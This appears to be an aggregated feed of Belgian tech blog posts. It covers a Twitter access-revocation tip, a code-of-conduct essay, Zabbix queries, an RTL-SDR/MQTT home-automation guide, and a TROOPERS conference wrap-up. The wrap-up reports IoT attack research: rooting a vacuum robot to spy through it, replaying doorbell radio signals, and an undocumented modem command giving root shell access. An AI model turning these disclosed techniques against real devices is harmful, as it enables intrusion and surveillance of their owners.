
Xavier Mertens: [SANS ISC Diary] Retro Hunting!


I published the following diary on isc.sans.org: “Retro Hunting!“.

For a while now, one of the trends in security has been to integrate information from third-party feeds to improve the detection of suspicious activities. By collecting indicators of compromise, other tools can correlate them with their own data and generate alerts on specific conditions. The initial goal is to share new IOCs with peers as quickly as possible to improve detection capabilities and, maybe, prevent further attacks or infections… [Read more]

[The post [SANS ISC Diary] Retro Hunting! was first published on /dev/random]


Xavier Mertens: TROOPER 10 Ahead!


Next week, it's already the 10th edition of the TROOPERS conference in Heidelberg, Germany. I'll be there and will cover the event via Twitter and daily wrap-ups. It will be my 3rd edition and, since the beginning, I have been impressed by the quality of the organization, both in terms of content and from a technical point of view. There aren't many events that provide SIM cards so you can use their own mobile network! Besides the classic activities, there are the hacker run, PacketWars and the charity auction.

The event will be split into two phases. On Monday and Tuesday, NGI, or "Next Generation Internet", will take place and offer two different tracks: one focusing on IPv6 and the other on IoT. The schedule is available here. Here is the selection of talks that I'll (try to) attend and cover:

  • What happened to your home? IoT Hacking and Forensic with 0-day
  • IPv6 Configuration Approaches for Servers
  • IoT to Gateway
  • Dissecting modern (3G/4G) cellular modems
  • RIPE Atlas, Measuring the Internet
  • Hidden in plain sight; How possibly could a decades old standard be broken?
  • An introduction to automotive ECU research
  • PUFs ‘n Stuff: Getting the most of the digital world through physical identities
  • BLE authentication design challenges on smartphone controlled IoT devices: analyzing Gogoro Smart Scooter
  • Metasploit Hardware Bridge Hacking
  • Hacking TP-Link Devices

On Wednesday and Thursday, regular talks are scheduled across three concurrent tracks: "Attack & research", "Defense & management" and "SAP". Personally, SAP is less interesting to me (I'm not working with this monster). Again, here is my current selection (most of them are from the "Defense & management" track):

  • Hunting Them All
  • Securing Network Automation
  • Vox Ex Machina
  • Architecting a Modern Defense using Device Guard
  • Exploring North Korea’s Surveillance Technology
  • Arming Small Security Programs: Network Baseline Generation and Alerts with Bropy
  • PHP Internals: Exploit Dev Edition
  • How we hacked Distributed Configuration Management Systems
  • Ruler – Pivoting Through Exchange
  • Demystifying COM
  • Graph me, I’m famous! – Automated static malware analysis and indicator extraction for binaries
  • Windows 10 – Endpoint Security Improvements and the Implant since Windows 2000

Nice program, plenty of interesting topics! Keep an eye here for the wrap-ups. And, if you're in Heidelberg, ping me if you want to chat.

 

[The post TROOPER 10 Ahead! was first published on /dev/random]

Xavier Mertens: Keep Calm and Revoke Access


For the last 24 hours, the Twitter landscape has seen several official accounts hacked. The same tweet was posted thousands of times. It was about the political conflict between Turkey and the Netherlands:

Amnesty Fake Tweet

Many other accounts were affected (like the one of the EU Commission). Usually, Twitter accounts are hijacked simply due to weak credentials and the lack of controls like 2FA. But this time, it was different. What do all those accounts have in common? They used a 3rd-party service called Twitter Counter [Note: the Twitter Counter website is currently "under maintenance"]. This service, amongst hundreds of others, offers nice features on top of Twitter to give you better visibility into your account. To achieve this, such services request access to your account. Access levels vary, from reading your timeline and seeing who you follow, to posting tweets, up to changing your settings. More info is provided here by Twitter. To me, those services can be considered the plugins of modern CMSs: they provide nice features but also increase the attack surface. That's exactly the scenario seen today.

How to protect yourself against this kind of attack? First, do not link your Twitter account to untrusted or suspicious applications. And, exactly as with mobile apps, do not grant access to everything! Apply the principle of least privilege. Why allow a statistics service to change your settings if read-only access to your timeline is sufficient?

Finally, the best advice is to visit the following link at regular intervals: https://twitter.com/settings/applications. During your first visit, you may be surprised to find so many applications linked to your account! Here is a small example:

Twitter Apps

Ideally, this list should be reviewed at regular intervals: revoke access to applications that you don't use anymore, to apps that you don't remember why you granted permissions to, and to any other suspicious app! Tip: create a reminder to perform this task every x months.

Oh, don’t forget that the same applies to other social networks too, like Facebook.

Stay safe!

[The post Keep Calm and Revoke Access was first published on /dev/random]

Wouter Verhelst: Codes of Conduct


These days, most large FLOSS communities have a "Code of Conduct"; a document that outlines the acceptable (and possibly not acceptable) behaviour that contributors to the community should or should not exhibit. By writing such a document, a community can arm itself more strongly in the fight against trolls, harassment, and other forms of antisocial behaviour that is rampant on the anonymous medium that the Internet still is.

Writing a good code of conduct is no easy matter, however. I should know -- I've been involved in such a process twice; once for Debian, and once for FOSDEM. While I was the primary author for the Debian code of conduct, the same is not true for the FOSDEM one; I was involved, and I did comment on a few early drafts, but the core of FOSDEM's current code was written by another author. I had wanted to write a draft myself, but then this one arrived and I didn't feel like I could improve it, so it remained.

While it's not easy to come up with a Code of Conduct, there (luckily) are others who walked this path before you. On the "geek feminism" wiki, there is an interesting overview of existing Open Source community and conference codes of conduct, and reading one or more of them can provide one with some inspiration as to things to put in one's own code of conduct. That wiki page also contains a paragraph "Effective codes of conduct", which says (amongst other things) that a good code of conduct should include

Specific descriptions of common but unacceptable behaviour (sexist jokes, etc.)

The attentive reader will notice that such specific descriptions are noticeably absent from both the Debian and the FOSDEM codes of conduct. This is not because I hadn't seen the above recommendation (I had); it is because I disagree with it. I do not believe that adding a list of "don't"s to a code of conduct is a net positive to it.

Why, I hear you ask? Surely having a list of things that are not welcome behaviour is a good thing, which should be encouraged? Surely such a list clarifies the kind of things your community does not want to see? Having such a list will discourage that bad behaviour, right?

Well, no, I don't think so. And here's why.

Enumerating badness

A list of things not to do is like a virus scanner. For those not familiar with these: on some operating systems, there is a specific piece of software that everyone recommends you run, which checks if particular blobs of data appear in files on the disk. If they do, then these files are assumed to be bad, and are kicked out. If they do not, then these files are assumed to be not bad, and are left alone (for the most part).

This works if we know all the possible types of badness; but as soon as someone invents a new form of badness, suddenly your virus scanner is ineffective. Additionally, it also means you're bound to continually have to update your virus scanner (or, as the case may be, code of conduct) in response to a continually changing hostile world. For these (and other) reasons, enumerating badness is listed as number 2 in security expert Markus Ranum's "six dumbest ideas in computer security," which was written in 2005.

In short, a list of "things not to do" is bound to be incomplete; if the goal is to clarify the kind of behaviour that is not welcome in your community, it is usually much better to explain the behaviour that is wanted, so that people can infer (by their absence) the kind of behaviour that isn't welcome.

This neatly brings me to my next point...

Black vs White vs Gray.

The world isn't black-and-white. We could define a list of welcome behaviour -- let's call that the whitelist -- or a list of unwelcome behaviour -- the blacklist -- and assume that the work is done after doing so. However, that wouldn't be true. For every item on either the white or black list, there's going to be a number of things that fall somewhere in between. Let's say those things are on the "gray" list. They're not the kind of outstanding behaviour that we would like to see -- they'd be on the white list if they were -- but they're not really obvious CoC violations, either. You'd prefer it if people don't do those things, but it'd be a stretch to say they're jerks if they do.

Let's clarify that with an example:

Is it a code of conduct violation if you post links to pornography websites on your community's main development mailinglist? What about jokes involving porn stars? Or jokes that denigrate women, or that explicitly involve some gender-specific part of the body? What about an earring joke? Or a remark about a user interacting with your software, where the women are depicted as not understanding things as well as men? Or a remark about users in general, that isn't written in a gender-neutral manner? What about a piece of self-deprecating humor? What about praising someone else for doing something outstanding?

I'm sure most people would agree that the first case in the above paragraph should be a code of conduct violation, whereas the last case should not be. Some of the items in the list in between are clearly on one or the other side of the argument, but for others the jury is out. Let's say those are in the gray zone. (Note: no, I did not mean to imply that the list is ordered in any way ;-)

If you write a list of things not to do, then by implication (because you didn't mention them), the things in the gray area are okay. This is especially problematic when it comes to things that are borderline blacklisted behaviour (or that should be blacklisted but aren't, because your list is incomplete -- see above). In such a situation, you're dealing with people who are jerks but can argue about it because your definition of jerk didn't cover their behaviour. Because they're jerks, you can be sure they'll do everything in their power to waste your time about it, rather than improving their behaviour.

In contrast, if you write a list of things that you want people to do, then by implication (because you didn't mention it), the things in the gray area are not okay. If someone slips and does something in that gray area anyway, then that probably means they're doing something borderline not-whitelisted, which would be mildly annoying but doesn't make them jerks. If you point that out to them, they might go "oh, right, didn't think of it that way, sorry, will aspire to be better next time". Additionally, the actual jerks and trolls will have been given fewer tools to argue about borderline violations (because the border of your code of conduct is far, far away from jerky behaviour), so less time is wasted for those of your community who have to police it (yay!).

In theory, the result of a whitelist is a community of people who aspire to be nice people, rather than a community of people who simply aspire to be "not jerks". I know which kind of community I prefer.

Giving the wrong impression

During one of the BOFs that were held while I was drafting the Debian code of conduct, it was pointed out to me that a list of things not to do may give the impression to people that all these things on this list do actually happen in the code's community. If that is true, then a very long list may produce the impression that the given community is a community with a lot of problems.

Instead, a whitelist-based code of conduct will provide the impression that you're dealing with a healthy community. Whether that is the case obviously depends on more factors than just the code of conduct itself, but it will put people in the right mindset for this to become something of a self-fulfilling prophecy.

Conclusion

Given all of the above, I think a whitelist-based code of conduct is a better idea than a blacklist-based one. Additionally, in the few years since the Debian code of conduct was accepted, it is my impression that the general atmosphere in the Debian project has improved, which would seem to confirm that the method works (but YMMV, of course).

At any rate, I'm not saying that blacklist-based codes of conduct are useless. However, I do think that whitelist-based ones are better; and hopefully, you now agree, too ;-)

Mattias Geniar: Finding the biggest data (storage) consumers in Zabbix


The post Finding the biggest data (storage) consumers in Zabbix appeared first on ma.ttias.be.

If you run Zabbix long enough, eventually your database will grow to sizes you'd rather not see. And that raises the question: which items are consuming the most storage in my Zabbix backend, be it MySQL, PostgreSQL or something else?

I investigated the same question and found the following queries to be very useful.

Before you start to look into this, make sure you first clean up your database of older orphaned records; see an older post of mine for more details.

What items have the most value records?

These probably also consume the most disk space.

For the history_uint table (holds all integer values):

SELECT COUNT(history.itemid), history.itemid, i.name, i.key_, h.host
FROM history_uint AS history
LEFT JOIN items AS i ON i.itemid = history.itemid
LEFT JOIN hosts AS h ON i.hostid = h.hostid
GROUP BY history.itemid
ORDER BY COUNT(history.itemid) DESC
LIMIT 100;

For the history table (holds all float & double values):

SELECT COUNT(history.itemid), history.itemid, i.name, i.key_, h.host
FROM history AS history
LEFT JOIN items AS i ON i.itemid = history.itemid
LEFT JOIN hosts AS h ON i.hostid = h.hostid
GROUP BY history.itemid
ORDER BY COUNT(history.itemid) DESC
LIMIT 100;

For the history_text table (holds all text values):

SELECT COUNT(history.itemid), history.itemid, i.name, i.key_, h.host
FROM history_text AS history
LEFT JOIN items AS i ON i.itemid = history.itemid
LEFT JOIN hosts AS h ON i.hostid = h.hostid
GROUP BY history.itemid
ORDER BY COUNT(history.itemid) DESC
LIMIT 100;

The post Finding the biggest data (storage) consumers in Zabbix appeared first on ma.ttias.be.

Philip Van Hoof: Duck typing


Imagine you have a duck. Imagine you have a wall. Now imagine you throw the duck with a lot of force against a wall. Duck typing means that the duck hitting the wall quacks like a duck would.

ps. Replace wall with API and duck with ugly stupid script written by an idiot. You can leave quacks.

Dries Buytaert: How the YMCA uses Drupal to accelerate its mission


The YMCA is a leading nonprofit dedicated to strengthening communities through youth development, healthy living and social responsibility. Today, the YMCA serves more than 58 million people in 130 countries around the world. The YMCA is a loose federation, meaning that each association operates independently to best meet the needs of the local community. In the United States alone, there are 874 associations, each with their own CEO and board of directors. As associations vary in both size and scale, each YMCA is responsible for maintaining their own digital systems and tools at their own expense.

In 2016, the YMCA of Greater Twin Cities set out to develop a Drupal distribution, called Open Y. The goal of Open Y was to build a platform to enable all YMCAs to operate as a unified brand through a common technology.

Features of the Open Y platform

Open Y strives to provide the best customer experience for their members. The distribution, developed on top of Drupal 8 in partnership with Acquia and FFW, offers a robust collection of features to deliver a multi channel experience for websites, mobile applications, digital signage, and fitness screens.

On an Open Y website customers can schedule personal training appointments, look up monthly promotions, or donate to their local YMCA online. Open Y also takes advantage of Drupal 8's APIs to integrate all of their systems with Drupal. This includes integration with Open Y's Customer Relationship Management (CRM) and eCommerce partners, but also extends to fitness screens and wearables like Fitbit. This means that Open Y can use Drupal as a data repository to serve content, such as alerts or program campaigns, to digital signage screens, connected fitness consoles and popular fitness tracking applications. Open Y puts Drupal at the core of their digital platform to provide members with seamless and personalized experiences.

Philosophy of collaboration

The founding principle of Open Y is that the platform adopts a philosophy of collaboration that drives innovation and impact. Participants of Open Y have developed a charter that dictates expectations of collaboration and accountability. The tenets of the charter allow for individual associations to manage their own projects and to adopt the platform at their own pace. However, once an association adopts Open Y, they are expected to contribute back any new features to the Open Y distribution.

As a nonprofit, YMCAs cannot afford expensive proprietary licenses. Because participating YMCAs collaborate on the development of Open Y, and because there are no licensing fees associated with Drupal, the total cost of ownership is much lower than proprietary solutions. The time and resources that are saved by adopting Drupal allow YMCAs around the country to better focus on their customers' experience and lean into innovation. The same could not be achieved with proprietary software.

For example, the YMCA of Greater Seattle was the second association to adopt the Open Y platform. When building its website, the YMCA of Greater Seattle was able to repurpose over a dozen modules from the YMCA of the Greater Twin Cities. That helped Seattle save time and money in their development. Seattle then used their savings to build a new data personalization module to contribute back to the Open Y community. The YMCA of the Greater Twin Cities will be able to benefit from Seattle's work and adopt the personalization features into its own website. By contributing back and by working together on the Open Y distribution, these YMCAs are engaging in a virtuous cycle that benefits their own projects.

The momentum of Open Y

In less than one year, 18 YMCA associations have committed to adopting Open Y and over 22 other associations are currently evaluating the platform. Open Y has created a platform that all stakeholders under the YMCA brand can use to collaborate through a common technology and a shared philosophy.

Open Y is yet another example of how organizations can challenge the prevailing model of digital experience delivery. By establishing a community philosophy that encourages contribution, Open Y has realized accelerated growth, feature development, and adoption. Organizations that are sharing contributions and embracing collaboration are evolving their operating models to achieve more than ever before.

Because I am passionate about the Open Y team's mission and impact, I have committed to be an advisor and sponsor to the project. I've been advising them since November 2016. Working with Open Y is a way for me to give back, and it's been very exciting to witness their progress first hand.

If you want to help contribute to the Open Y project, consider attending their DrupalCon Baltimore session on building custom Drupal distributions for federated organizations. You can also connect with the Open Y team directly at OpenYMCA.org.

Philip Van Hoof: Merkel bashing


It seems to be the new sport of nitwit moronic world leaders like Trump and Erdogan to bash Frau Merkel.

It makes me respect her more.


Xavier Mertens: [SANS ISC Diary] Example of Multiple Stages Dropper


I published the following diary on isc.sans.org: “Example of Multiple Stages Dropper“.

While some malware samples remain simple (see my previous diary), others try to install malicious files on victim computers in a smoother way. Here is a nice example that my spam trap captured a few days ago. The mail looks like a classic phishing attempt… [Read more]

[The post [SANS ISC Diary] Example of Multiple Stages Dropper was first published on /dev/random]

FOSDEM organizers: Video work almost finished

Almost all of the video recordings from FOSDEM 2017 have been cut, transcoded, and released. There are a handful of talks left to fix up, which will happen no later than next weekend. The weekend after that, we plan to shut down this year's video-processing infrastructure, unless something important pops up. Videos are linked from the individual schedule pages for the talks and the full schedule page. They are mirrored from video.fosdem.org. While all videos have been reviewed by a human before they were released, it remains possible that one or more issues fell through the cracks. Therefore, if you…

Xavier Mertens: [SANS ISC] Searching for Base64-encoded PE Files


I published the following diary on isc.sans.org: “Searching for Base64-encoded PE Files“.

When hunting for suspicious activity, it’s always a good idea to search for Microsoft Executables. They are easy to identify: They start with the characters “MZ” at the beginning of the file. But, to bypass classic controls, those files are often obfuscated (XOR, Rot13 or Base64)… [Read more]
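Not from the diary itself, but as a quick illustration of the idea: because Base64 encodes data in 3-byte groups, the typical PE/DOS header bytes "MZ\x90\x00" always encode to a string starting with "TVqQ", so a very naive hunt can simply look for that marker in captured text. A minimal Python sketch (file name and length threshold are my own assumptions):

import base64
import re
import sys

# Most PE files start with the DOS header bytes "MZ\x90\x00";
# Base64-encoding those bytes yields the prefix "TVqQ".
PE_B64_MARKER = base64.b64encode(b"MZ\x90\x00")[:4].decode()  # "TVqQ"

def find_b64_pe(path):
    """Return long Base64 runs that look like encoded PE files."""
    data = open(path, "r", errors="ignore").read()
    return re.findall(PE_B64_MARKER + r"[A-Za-z0-9+/=]{100,}", data)

if __name__ == "__main__":
    for candidate in find_b64_pe(sys.argv[1]):
        print(candidate[:60] + "...")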

[The post [SANS ISC] Searching for Base64-encoded PE Files was first published on /dev/random]

Tom Laermans: Getting your CurrentCost (433MHz) data into OpenHAB using an RTL-SDR dongle and MQTT


CurrentCost?

CurrentCost is a UK company founded in 2010 which provides home power measuring hardware. Their main product is a transmitter which uses an inductive clamp to measure power usage of your household. On top of that, they also provide Individual Appliance Monitors (IAMs) which sit between your device and the outlet, and measure its power usage.

The transmitters broadcast their findings wirelessly. To display the data, a number of different displays are sold, which can indicate total usage, per-IAM data, trending and even cost if you care to set that up. I myself have the EnviR, which has USB connectivity (with an optional cable) so you can process the CurrentCost data on your computer. Up to 9 IAMs can be connected to the EnviR.

I bought my CurrentCost products over 5 years ago, but it does look like they are still on sale. CurrentCost operates an eBay store where you can buy their hardware if you're not in the UK.

Important note: Should you decide to acquire any of their IAM hardware, do note that their "EU" IAM plugs are in fact "Schuko" (type F) plugs, as used in Germany and the Netherlands, with side ground contacts instead of a grounding pin. That wouldn't be so much of an issue, except that they don't have an accommodating hole for the pin, so they won't fit standard EU (non-German, non-Dutch, type E) outlets without a converter! The device side is usually fine, as most if not all plugs also support side ground contacts, and if they don't, at least the lack of a pin does not impede plugging it in.

OpenHAB?

OpenHAB is an open source, Java-powered Home Automation Bus; what this basically means is it’s a centralized hub that can connect to many systems that have found their way into your house, such as your smart TV, your ethernet-capable Audio Receiver, Hue lighting, Z-Wave- or Zigbee-powered accessories, HVAC systems, Kodi, CUPS, and even anything that speaks SNMP or MQTT or Amazon’s Alexa. It’s pretty much fully able to integrate into anything you can throw at it.

If you’re not already using OpenHAB, this post may not be very useful to you… Yet.

MQTT?

MQTT (short for Message Queue Telemetry Transport) is a publish-subscribe-based "lightweight" messaging protocol. In short, you run one (or multiple) MQTT broker(s), and clients can then "subscribe" to certain topics (topics being freehand names, pretty much), while other clients, or even the same ones, "publish" data to those same topics.

MQTT is a quick and elegant solution to have data circulate between different services, over the network or on the local machine – the fact that that data is broadcast over certain topics means multiple listeners (“subscribers”) can all act on that same data being published.

OpenHAB supports MQTT in both directions – it can listen to incoming topics, or broadcast certain things over MQTT as well.

The configuration below assumes you already have an MQTT broker to publish the radio messages to; setting up Mosquitto or similar is out of scope for this article.

Getting data out of CurrentCost

The EnviR outputs the following string regularly (every 6 seconds) over its USB serial port:

<msg><src>CC128-v1.48</src><dsb>00012</dsb><time>22:18:34</time><tmpr>24.9</tmpr><sensor>0</sensor><id>02015</id><type>1</type><ch1><watts>00876</watts></ch1></msg>

This is a line of data reporting power usage sent by sensor ID 2015 (every sensor has its own 12-bit ID), of type 1 (this is either the main unit or an IAM), reporting 876 W on the first channel. The <tmpr> field is indeed a temperature reading: it comes from a temperature sensor inside the EnviR and simply measures the temperature where your display is located.
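For illustration, pulling the interesting fields out of such a line takes only a few lines of Python with the standard library (this is just a minimal sketch, not the PHP scripts mentioned below):

import xml.etree.ElementTree as ET

line = ('<msg><src>CC128-v1.48</src><dsb>00012</dsb><time>22:18:34</time>'
        '<tmpr>24.9</tmpr><sensor>0</sensor><id>02015</id><type>1</type>'
        '<ch1><watts>00876</watts></ch1></msg>')

msg = ET.fromstring(line)
sensor_id = int(msg.findtext("id"))         # transmitter ID (2015)
watts = int(msg.findtext("ch1/watts"))      # power reported on the first channel
tmpr = float(msg.findtext("tmpr"))          # temperature at the EnviR display

print(f"sensor {sensor_id}: {watts} W, display temperature {tmpr} °C")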

Back in 2012, I wrote a set of PHP scripts parsing this data and putting it into separate files in /tmp, with a separate script then throwing this data into RRD files every minute to be visualised in graphs. I never published it because to be frank it was a bit of an ugly hack. However it did work, and I had perfect visibility into when my 3 monitors went into standby, when the TV/Home theater amplifier was on, etc.

After getting a taste of this, spurred on by JP, I dived into Home Automation and ended up using OpenHAB. For years I’ve “planned” to write a CurrentCost binding for OpenHAB, so it would natively support the XML serial protocol, and just read out everything automatically. I never got around to figuring out how to create an OpenHAB binding though, so my stats were separate in those RRD files for years. When I moved, I didn’t even reinstall the CurrentCost sensors, as I was already using Z-Wave based power sensors for most things I wanted to measure.

In the meanwhile I also encountered current-cost-forwarder which listens for the XML data and sends it over to an MQTT broker. That did alleviate the need for a dedicated binding, but I never got around to trying this out, so I can’t tell you how well it works.

The magic of RTLSDR

RTLSDR is a great software defined radio (SDR) based on very cheap Realtek RTL28xx chips, originally meant to receive DVB-T broadcast. This means you can pretty much listen in on any frequency between ~22MHz and ~1100MHz, including FM radio, ADS-B aircraft data, and many others. And by cheap, I do mean cheap, you can find RTLSDR-compatible USB dongles on eBay for 5€ or less!

CurrentCost transmitters use the 433MHz frequency, like many other home devices (car keys, wireless headphones, garage openers, weather stations, …). As I was playing around with the rtl_433 tool, which uses RTLSDR to sniff 433MHz communications, I noticed my CurrentCost sensor data passing by as well. That gave me the idea for this system, and the setup in use that led to this blog post.

Additional advantages for this are that you can now use as many IAMs as you want and are no longer limited to 9, and there is no need to have the EnviR connected to one of your server’s USB ports. In fact, you don’t even need the EnviR display at all, and can even drop the base transmitter if you only want to read out IAM data.

As an extra, any other communication picked up by rtl_433 on 433MHz will also be automatically piped into MQTT for consumption by anything else you want to run. If you (or your neighbours!) have a weather station, anemometer or anything else transmitting on 433MHz (and supported by rtl_433), you can consume this data in OpenHAB just as well!

Sniffing the 433MHz band

First off, let’s install rtl_433:

~# apt-get install rtl-sdr librtlsdr-dev cmake build-essential
~# git clone https://github.com/merbanan/rtl_433.git
Cloning into 'rtl_433'...
remote: Counting objects: 5722, done.
(...)
Checking connectivity... done.
~# cd rtl_433/
~/rtl_433# mkdir build
~/rtl_433# cd build
~/rtl_433/build# cmake ..
-- The C compiler identification is GNU 4.9.2
(...)
-- Build files have been written to: /root/rtl_433/build
~/rtl_433/build# make
~/rtl_433/build# make install

Once it’s been installed, let’s do a test run. If you have CurrentCost transmitters plugged in, you should see their data flash by. Unfortunately, nobody in my neighbourhood seems to have any weather stations or outdoor temperature sensors, so only CurrentCost output for me:

~# rtl_433 -G
Using device 0: Generic RTL2832U
Found Rafael Micro R820T tuner
Exact sample rate is: 250000.000414 Hz
Sample rate set to 250000.
Bit detection level set to 0 (Auto).
Tuner gain set to Auto.
Reading samples in async mode...
Tuned to 433920000 Hz.
2017-02-27 17:53:12 : CurrentCost TX
Device Id: 2015
Power 0: 26 W
Power 1: 0 W
Power 2: 0 W

To end the program, press ctrl-C.

What we can see in the output here:

  • Device Id: the same device ID as was reported by the EnviR's XML protocol. It likely changes when you press the pair button.
  • Power 0: this is the only power entry you'll see for IAM modules; the base device may also report data for the second and third clamp.

It is possible you see the following error when running rtl_433:

Kernel driver is active, or device is claimed by second instance of librtlsdr.
In the first case, please either detach or blacklist the kernel module
(dvb_usb_rtl28xxu), or enable automatic detaching at compile time.

This means your OS has autoloaded the DVB drivers when you plugged in your USB stick, before you installed the rtl-sdr package. You can unload them manually:

rmmod dvb_usb_rtl28xxu rtl2832

The rtl-sdr package contains a blacklist entry for this driver, so it shouldn’t be a problem anymore from now on. Then, try running the command again.

Relaying 433MHz data to MQTT

Install mosquitto-clients, which provides mosquitto_pub which will be used to publish data to the broker:

~# apt-get install mosquitto-clients

Next, install the systemd service file which will run the relay for us:

~# cat <<EOF > /etc/systemd/system/rtl_433-mqtt.service
[Unit]
Description=rtl_433 to MQTT publisher
After=network.target
[Service]
ExecStart=/bin/bash -c "/usr/local/bin/rtl_433 -q -F json |/usr/bin/mosquitto_pub -h <your.broker.hostname> -i RTL_433 -l -t RTL_433/JSON"
Restart=always
RestartSec=5
[Install]
WantedBy=multi-user.target
EOF
~# systemctl daemon-reload
~# systemctl enable rtl_433-mqtt

This will publish JSON-formatted messages containing the 433MHz data to your MQTT broker on the RTL_433/JSON topic.

Don’t forget to replace your broker’s hostname on the correct line. I tried to make it use an Environment file first, but unfortunately ran into a few issues using those variables, due to needing to run the command in an actual shell because of the pipe. If you figure out a way to make that work, please do let me know.

See if it works

We can subscribe to the MQTT topic using the mosquitto_sub tool from the mosquitto-clients package:

mosquitto_sub -h <your.broker.hostname> -t RTL_433/JSON

Doing this should yield a number of output lines such as this:

{"time" : "2017-03-19 21:26:25", "model" : "CurrentCost TX", "dev_id" : 2015, "power0" : 0, "power1" : 0, "power2" : 0}

Press Ctrl-C to exit the utility. If this didn’t yield any useful JSON output, check the status of the service with systemctl status rtl_433-mqtt and correct any issues.

Add items to OpenHAB

The following instructions were written for OpenHAB 1.x. Even though OpenHAB 2.x has a new way of adding “things” and “channels”, they work on that version as well – there is no automatic web-based configuration for MQTT items anyway.

Create items such as these in the OpenHAB items file of your choice (where this is exactly depends on your OpenHAB major version and whether you installed using debian packages or from the zip file).

Number Kitchen_Boiler_Power "Kitchen Boiler [%.1f W]" (GF_Kitchen) { mqtt="<[your.broker.hostname:RTL_433/JSON:state:JSONPATH($.power0):.*\"dev_id\" \\: 2015,.*]"}

Replace the dev_id being matched (2015 in the example above) with the ID of your CurrentCost transmitter. As all rtl_433 broadcasts come in on the same topic, a regular expression is used to match a single Device Id. If you want to read another phase, replace power0 by power1 or power2.

If you want to receive other 433MHz broadcasts, you may need to change the regex to make sure it’s only catching CurrentCost sensors – although the dev_id match alone might be enough. Let me know!
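If you would rather consume (or debug) the data outside OpenHAB, the same dev_id filtering can be done in a few lines of Python. This is only a minimal sketch, assuming the paho-mqtt library is installed; replace the broker hostname and device ID with your own:

import json
import paho.mqtt.client as mqtt

BROKER = "your.broker.hostname"   # your MQTT broker
TOPIC = "RTL_433/JSON"            # topic used by the rtl_433 relay above
DEV_ID = 2015                     # the CurrentCost transmitter to watch

def on_message(client, userdata, msg):
    data = json.loads(msg.payload.decode())
    # Only act on CurrentCost readings from the transmitter we care about.
    if data.get("model") == "CurrentCost TX" and data.get("dev_id") == DEV_ID:
        print(f"{data['time']}: {data['power0']} W")

client = mqtt.Client()
client.on_message = on_message
client.connect(BROKER)
client.subscribe(TOPIC)
client.loop_forever()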

Writing informative technical how-to documentation takes time, dedication and knowledge. Should my blog series have helped you in getting things working the way you want them to, or configure certain software step by step, feel free to tip me via PayPal (paypal@powersource.cx) or the Flattr button. Thanks!

Xavier Mertens: TROOPERS 2017 Day #1 Wrap-Up


I'm in Heidelberg (Germany) for the 10th edition of the TROOPERS conference. The regular talks are scheduled on Wednesday and Thursday. The first two days are reserved for trainings and a pre-conference event called "NGI", for "Next Generation Internet", focusing on two hot topics: IPv6 and IoT. As said on the website: "NGI aims to provide discussion on how to secure these core technologies by bringing together practitioners from this space and some of the smartest researchers of the respective fields". I initially planned to attend talks from both worlds but I stayed in the "IoT" track because many talks were interesting.

The day started with a keynote by Steve Lord: "Of Unicorns and replicants". Steve flagged his keynote as a "positive" talk (usually, we tend to present negative stuff). It started with some facts like "The S in IoT stands for Security" and a recap of IoT history. This is clearly not a new idea: the first connected device was a Coca-Cola machine that was available via finger in… 1982! Who remembers this old-fashioned protocol? In 1985 came the first definition of "IoT": the integration of people, processes and technology with connectable devices and sensors to enable remote monitoring of status. In 2000, LG presented its very first connected fridge. 2009 was a key year with the explosion of crowdfunding campaigns. Indeed, many projects were born thanks to the financial participation of many people. It was a nice way to bring ideas to life. In 2015, Vizio smart TVs started to watch you. Of course, Steve also talked about St. Jude Medical and their bad pacemaker story. Common IoT problems are: botnets, endpoints, overreach (probably the biggest problem) and availability (remember the outage that affected Amazon a few days ago?). The second part of the keynote was indeed positive and Steve reviewed the differences between 2015 and 2017. In the past, cloud solutions were not so mature, there were communication issues, little open guidance and unrealistic expectations. People learn from mistakes, and some companies don't want nightmare stories like others had, so they are investing in security. So, yes, things are going (a little bit) better because more people are addressing security issues.

The first talk was "IoT hacking and Forensic with 0-day" by Moonbeom Park & Soohyun Jin. More and more IoT devices have been involved in security incidents. Mirai is one of the latest examples. To address this problem, the speakers explained their process based on the following steps: search for IoT targets, analyze the filesystem or vulnerabilities, attack and exploit, analyze the artefacts, install a RAT and control it using a C&C, then perform incident response using forensic skills. The example they used was a vacuum robot with a voice recording feature. The first question is just… "why?". They explained how to compromise the device which was, at the beginning, properly hardened. But it was possible to attack the protocol used to configure it: some JSON data was sent in clear text with the wireless configuration details. Once the robot was reconfigured to use a rogue access point, root access on the device was granted. That's nice, but how to control the robot, its camera and microphone? The idea was to turn it into a spying device. They explained how to achieve this and played a nice demo:

Vacuum robot spying device

So, why do we need IoT forensics? IoT devices can be involved in incidents. Issues? One of the issues is the way data is stored: there is no hard disk but flash memory. Linux remains the most used OS on IoT devices (73% according to the latest IoT developer survey). It is important to be able to extract the filesystem from such devices to understand how they work and to collect logs. Usually, filesystems are based on SquashFS and UBIFS. Tools were presented to access this data directly from Python. Example: the ubi_reader module. Once the filesystem is accessible, the forensic process remains the same.

The next talk was dedicated to SDR (Software Defined Radio) by Matt Knight & Marc Newline from Bastille: "So you want to hack radios?". The idea behind this talk was to open our eyes to all the connected devices that implement radio communications. Why should we care about them? Not only are they often insecure, they are also deployed everywhere. They are also built on compromises: size and cost constraints, weak batteries, challenging deployment scenarios and, once in the wild, they are difficult to patch. Matt and Marc explained during the talk how to perform reverse engineering. There are two approaches: hardware and software defined radio. They reviewed the pros & cons of each. How to reverse engineer a radio signal? Configure yourself as a receiver and try to map symbols. This is a five-step process:

  • Identify the channel
  • Identify the modulation
  • Determine the symbol rate
  • Synchronize
  • Extract symbols

In many cases, OSINT is helpful to learn how a device works (find online documentation). A lot of information is publicly available (example: on the FCC website – just check the FCC ID on the back of the device to get interesting info). They briefly introduced RF concepts, then the reverse engineering workflow. To illustrate this, they walked through different scenarios:

  • A Z-Wave home automation protocol
  • A doorbell (capture the button info and then replay it to make the doorbell ring, of course)
  • An HP wireless keyboard/mouse

After the lunch, Vladimir Wolstencroft presented "SIMBox Security: Fraud, Fun & Failure". This talk was tagged TLP:RED so no coverage here, but very nice content! It was one of my favourite talks of the day.

The next one was about the same topic: "Dissecting modern cellular 3G/4G modems" by Harald Welte. This talk is the result of research conducted by Harald. His company was looking for a new M2M ("Machine to Machine") solution. They searched for interesting devices and started to see what was in the box. Once a good candidate was found (the EC20 from Quectel), they started a security review and, guess what, they made nice findings. First, the device contained some Linux code. Based on this, all manufacturers have to respect the GPL and disclose the modified source code (it took a long time to get the information from Quectel). But why is Linux installed on this device? For Harald, it just increases the complexity. Here is a proof with the slide explaining how the device is rebooted:

Reboot Process

Crazy isn’t it? Another nice finding was the following AT command:

AT+QLINUXCMD=

It allows sending Linux commands to the device in read/write mode and as root. What else?

